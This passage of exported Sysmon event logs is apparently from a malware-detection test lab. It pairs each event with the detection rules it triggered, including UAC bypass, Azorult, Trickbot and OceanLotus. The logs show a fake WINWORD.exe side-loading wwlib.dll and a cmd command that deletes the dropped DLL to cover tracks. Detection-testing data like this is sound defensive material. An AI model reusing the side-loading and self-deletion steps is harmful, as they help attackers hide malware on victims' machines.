21:58:21.922"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424250,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:21.931385Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000000)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect","UtcTime":"2020-10-23 21:58:21.922"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424251,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:21.931451Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"Binary 
Data","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-3461203602-4096304019-2269080069-1000\\\\Device\\HarddiskVolume1\\Windows\\SysWOW64\\rundll32.exe","UtcTime":"2020-10-23 21:58:22.063"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424260,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:22.063160Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51F9-5F93-0000-0010551E5E00","ProcessId":9116,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-3461203602-4096304019-2269080069-1000\\\\Device\\HarddiskVolume1\\Windows\\SysWOW64\\rundll32.exe","UtcTime":"2020-10-23 
21:58:22.063"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424262,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:22.074619Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-3461203602-4096304019-2269080069-1000\\\\Device\\HarddiskVolume1\\Windows\\SysWOW64\\rundll32.exe","UtcTime":"2020-10-23 21:58:22.360"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424320,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:22.361291Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-10-23 
21:35:19.617","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FE-5F93-0000-0010DC535E00","ProcessId":8920,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\data.enc","UtcTime":"2020-10-23 21:58:22.360"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":424322,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:22.364651Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-10-23 21:35:19.617","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FE-5F93-0000-0010DC535E00","ProcessId":8920,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\config.xml","UtcTime":"2020-10-23 21:58:22.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":424323,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:22.391794Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Trickbot Malware 
Activity"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\wermgr.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Problem Reporting","FileVersion":"10.0.17763.1369 (WinBuild.160101.0800)","Hashes":"SHA1=231052FA4311FA3501539E34E21A624921E3C270,MD5=CD042F94B63D67E012CFB4297D313248,SHA256=61A84B2D8CA05C11E79DB8E18FEB0FE4BE1B8D555D0BE2651516B144800153AB,IMPHASH=4E00FCA0721761B10A8A7351CEFB0596","Image":"C:\\Windows\\System32\\wermgr.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6311-5F8F-0000-0020E0100900","LogonId":"0x910e0","OriginalFileName":"WerMgr","ParentCommandLine":"rundll32.exe c:\\temp\\winfire.dll,DllRegisterServer","ParentImage":"C:\\Windows\\SysWOW64\\rundll32.exe","ParentProcessGuid":"747F3D96-659B-5F8F-0000-001026C33300","ParentProcessId":2372,"ProcessGuid":"747F3D96-659E-5F8F-0000-001064E03300","ProcessId":5600,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-20 22:33:02.059"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":422695,"Execution_attributes":{"ProcessID":3408,"ThreadID":4448},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-20T22:33:02.063979Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\Public\\tools\\apt\\wwlib\\","Description":"Microsoft Office 
Word","FileVersion":"12.0.4518.1014","Hashes":"SHA1=534A7EA9C67BAB3E8F2D41977BF43D41DFE951CF,MD5=CEAA5817A65E914AA178B28F12359A46,SHA256=6C959CFB001FBB900958441DFD8B262FB33E052342948BAB338775D3E83EF7F7,IMPHASH=46337557842A2A62735BB11EB096B204","Image":"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-CA8D-5F8A-0000-0020100A0A00","LogonId":"0xa0a10","OriginalFileName":"WinWord.exe","ParentCommandLine":"C:\\Windows\\Explorer.EXE","ParentImage":"C:\\Windows\\explorer.exe","ParentProcessGuid":"747F3D96-CA8F-5F8A-0000-001025020B00","ParentProcessId":5104,"ProcessGuid":"747F3D96-D8DF-5F8A-0000-0010572F7200","ProcessId":3660,"Product":"2007 Microsoft Office system","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-17 11:43:27.491"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":417068,"Execution_attributes":{"ProcessID":3500,"ThreadID":4688},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-17T11:43:27.499490Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network 
Connections"],"event":{"Event":{"EventData":{"Company":"?","Description":"?","FileVersion":"?","Hashes":"SHA1=6F32C711AFA423DF203AE2A27B259299402CF317,MD5=F0FCD453346038E434FA2D9F1E769F5B,SHA256=DB07BB76B9B227A54092179F4DCB3DFC25B325887E01098125AC44FDA70104E6,IMPHASH=22B6C0416D4E9B8FF922CC11DE30ADE7","Image":"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe","ImageLoaded":"C:\\Users\\Public\\tools\\apt\\wwlib\\wwlib.dll","OriginalFileName":"?","ProcessGuid":"747F3D96-D8DF-5F8A-0000-0010572F7200","ProcessId":3660,"Product":"?","RuleName":"","Signature":"주식회사 엘리시온랩","SignatureStatus":"Valid","Signed":"true","UtcTime":"2020-10-17 11:43:27.769"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":417069,"Execution_attributes":{"ProcessID":3500,"ThreadID":4704},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2020-10-17T11:43:28.429353Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"Company":"?","Description":"?","FileVersion":"?","Hashes":"SHA1=6F32C711AFA423DF203AE2A27B259299402CF317,MD5=F0FCD453346038E434FA2D9F1E769F5B,SHA256=DB07BB76B9B227A54092179F4DCB3DFC25B325887E01098125AC44FDA70104E6,IMPHASH=22B6C0416D4E9B8FF922CC11DE30ADE7","Image":"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe","ImageLoaded":"C:\\Users\\Public\\tools\\apt\\wwlib\\wwlib.dll","OriginalFileName":"?","ProcessGuid":"747F3D96-D8DF-5F8A-0000-0010572F7200","ProcessId":3660,"Product":"?","RuleName":"","Signature":"주식회사 엘리시온랩","SignatureStatus":"Valid","Signed":"true","UtcTime":"2020-10-17 
11:43:27.769"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":417070,"Execution_attributes":{"ProcessID":3500,"ThreadID":4704},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2020-10-17T11:43:28.429717Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft Office Word","FileVersion":"12.0.4518.1014","Hashes":"SHA1=534A7EA9C67BAB3E8F2D41977BF43D41DFE951CF,MD5=CEAA5817A65E914AA178B28F12359A46,SHA256=6C959CFB001FBB900958441DFD8B262FB33E052342948BAB338775D3E83EF7F7,IMPHASH=46337557842A2A62735BB11EB096B204","Image":"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-CA8D-5F8A-0000-0020D1090A00","LogonId":"0xa09d1","OriginalFileName":"WinWord.exe","ParentCommandLine":"C:\\Windows\\SysWOW64\\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}","ParentImage":"C:\\Windows\\SysWOW64\\dllhost.exe","ParentProcessGuid":"747F3D96-D8E2-5F8A-0000-0010F28A7200","ParentProcessId":8500,"ProcessGuid":"747F3D96-D8E3-5F8A-0000-001029A37200","ProcessId":1256,"Product":"2007 Microsoft Office system","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-17 
11:43:31.478"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":417071,"Execution_attributes":{"ProcessID":3500,"ThreadID":4688},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-17T11:43:31.484036Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"Company":"?","Description":"?","FileVersion":"?","Hashes":"SHA1=6F32C711AFA423DF203AE2A27B259299402CF317,MD5=F0FCD453346038E434FA2D9F1E769F5B,SHA256=DB07BB76B9B227A54092179F4DCB3DFC25B325887E01098125AC44FDA70104E6,IMPHASH=22B6C0416D4E9B8FF922CC11DE30ADE7","Image":"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe","ImageLoaded":"C:\\Users\\Public\\tools\\apt\\wwlib\\wwlib.dll","OriginalFileName":"?","ProcessGuid":"747F3D96-D8E3-5F8A-0000-001029A37200","ProcessId":1256,"Product":"?","RuleName":"","Signature":"주식회사 엘리시온랩","SignatureStatus":"Valid","Signed":"true","UtcTime":"2020-10-17 11:43:31.615"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":417072,"Execution_attributes":{"ProcessID":3500,"ThreadID":4688},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2020-10-17T11:43:31.627786Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network 
Connections"],"event":{"Event":{"EventData":{"Company":"?","Description":"?","FileVersion":"?","Hashes":"SHA1=6F32C711AFA423DF203AE2A27B259299402CF317,MD5=F0FCD453346038E434FA2D9F1E769F5B,SHA256=DB07BB76B9B227A54092179F4DCB3DFC25B325887E01098125AC44FDA70104E6,IMPHASH=22B6C0416D4E9B8FF922CC11DE30ADE7","Image":"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe","ImageLoaded":"C:\\Users\\Public\\tools\\apt\\wwlib\\wwlib.dll","OriginalFileName":"?","ProcessGuid":"747F3D96-D8E3-5F8A-0000-001029A37200","ProcessId":1256,"Product":"?","RuleName":"","Signature":"주식회사 엘리시온랩","SignatureStatus":"Valid","Signed":"true","UtcTime":"2020-10-17 11:43:31.615"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":417073,"Execution_attributes":{"ProcessID":3500,"ThreadID":4688},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2020-10-17T11:43:31.628328Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File","Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-10-17 10:48:12.936","Image":"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe","ProcessGuid":"747F3D96-D8E3-5F8A-0000-001029A37200","ProcessId":1256,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe","UtcTime":"2020-10-17 
11:43:33.444"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":417074,"Execution_attributes":{"ProcessID":3500,"ThreadID":4688},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-10-17T11:43:33.449476Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File","Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-10-17 10:48:12.936","Image":"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe","ProcessGuid":"747F3D96-D8E3-5F8A-0000-001029A37200","ProcessId":1256,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\wwlib.dll","UtcTime":"2020-10-17 11:43:33.444"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":417075,"Execution_attributes":{"ProcessID":3500,"ThreadID":4688},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-10-17T11:43:33.476471Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["MS Office Product Spawning Exe in User Dir","Microsoft Office Product Spawning Windows 
Shell"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\rundll32.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\AppData\\Roaming\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-CA8D-5F8A-0000-0020D1090A00","LogonId":"0xa09d1","OriginalFileName":"RUNDLL32.EXE","ParentCommandLine":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe --xStart","ParentImage":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe","ParentProcessGuid":"747F3D96-D8E5-5F8A-0000-0010E1BC7200","ParentProcessId":2920,"ProcessGuid":"747F3D96-D8E8-5F8A-0000-00102CEF7200","ProcessId":840,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-17 11:43:36.303"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":417079,"Execution_attributes":{"ProcessID":3500,"ThreadID":4688},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-17T11:43:36.306601Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["MS Office Product Spawning Exe in User Dir"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\explorer.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\AppData\\Roaming\\","Description":"Windows Explorer","FileVersion":"10.0.17763.1369 
(WinBuild.160101.0800)","Hashes":"SHA1=60E3F357B06AF9EB84FB9019BF08FB4DD109D4EC,MD5=AA0CA518E66F290FE0BAC6169473E8A9,SHA256=0D7CB0B75CD61CDFFE0E53910829FFA5C02C8759EBD27A49E2EF7A907A10E506,IMPHASH=FBEBD61CE702929C1F33B522FD572C5D","Image":"C:\\Windows\\SysWOW64\\explorer.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-CA8D-5F8A-0000-0020D1090A00","LogonId":"0xa09d1","OriginalFileName":"EXPLORER.EXE","ParentCommandLine":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe --xStart","ParentImage":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe","ParentProcessGuid":"747F3D96-D8E5-5F8A-0000-0010E1BC7200","ParentProcessId":2920,"ProcessGuid":"747F3D96-D8EC-5F8A-0000-001094207300","ProcessId":6552,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-17 11:43:40.835"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":417081,"Execution_attributes":{"ProcessID":3500,"ThreadID":4688},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-17T11:43:40.902894Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","MS Office Product Spawning Exe in User Dir"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\AppData\\Roaming\\","Description":"Microsoft Office 
Word","FileVersion":"12.0.4518.1014","Hashes":"SHA1=534A7EA9C67BAB3E8F2D41977BF43D41DFE951CF,MD5=CEAA5817A65E914AA178B28F12359A46,SHA256=6C959CFB001FBB900958441DFD8B262FB33E052342948BAB338775D3E83EF7F7,IMPHASH=46337557842A2A62735BB11EB096B204","Image":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-CA8D-5F8A-0000-0020D1090A00","LogonId":"0xa09d1","OriginalFileName":"WinWord.exe","ParentCommandLine":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe --xStart","ParentImage":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe","ParentProcessGuid":"747F3D96-D8E5-5F8A-0000-0010E1BC7200","ParentProcessId":2920,"ProcessGuid":"747F3D96-D8F1-5F8A-0000-00108B4B7300","ProcessId":1576,"Product":"2007 Microsoft Office system","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-17 11:43:45.116"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":417083,"Execution_attributes":{"ProcessID":3500,"ThreadID":4688},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-17T11:43:45.120170Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","MS Office Product Spawning Exe in User Dir","Microsoft Office Product Spawning Windows Shell"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c ping 127.0.0.1&&del del /F /Q /A:H \"C:\\Users\\IEUser\\AppData\\Roaming\\wwlib.dll\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\AppData\\Roaming\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.592 
(WinBuild.160101.0800)","Hashes":"SHA1=E2EAD0993B917E1828A658ADA0B87E01D5B8424F,MD5=C43699F84A68608E7E57C43B7761BBB8,SHA256=2EDB180274A51C83DDF8414D99E90315A9047B18C51DFD070326214D4DA59651,IMPHASH=392B4D61B1D1DADC1F06444DF258188A","Image":"C:\\Windows\\SysWOW64\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-CA8D-5F8A-0000-0020D1090A00","LogonId":"0xa09d1","OriginalFileName":"Cmd.Exe","ParentCommandLine":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe --xStart","ParentImage":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe","ParentProcessGuid":"747F3D96-D8E5-5F8A-0000-0010E1BC7200","ParentProcessId":2920,"ProcessGuid":"747F3D96-D8F5-5F8A-0000-00106B6F7300","ProcessId":1680,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-17 